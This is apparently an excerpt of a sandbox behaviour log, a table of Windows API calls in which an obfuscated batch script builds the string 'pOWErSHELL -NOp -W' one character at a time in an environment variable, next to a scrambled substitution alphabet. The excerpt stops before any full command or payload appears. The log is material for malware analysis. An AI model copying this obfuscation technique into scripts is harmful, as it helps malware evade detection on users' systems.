| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSHELL |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 24 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSHELL - |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 24 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSHELL -N |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSHELL -NO |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSHELL -NOp |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSHELL -NOp |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSHELL -NOp - |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSHELL -NOp -W |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSHELL -NOp -W |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
